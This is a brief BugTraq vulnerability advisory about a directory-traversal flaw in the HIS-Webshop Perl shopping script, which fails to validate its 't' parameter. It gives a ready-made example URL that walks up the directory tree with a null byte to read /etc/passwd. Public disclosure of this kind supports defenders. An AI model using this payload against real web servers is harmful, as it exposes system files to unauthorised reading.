SecurityFocus

BugTraq

HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de) Mar 24 2008 05:02PM
zero-x linuxmail org

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de

The script doesn´t check the "t"-parameter.

Example:

http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/p
asswd%00

<< Greetz Zero X >>

[ reply ]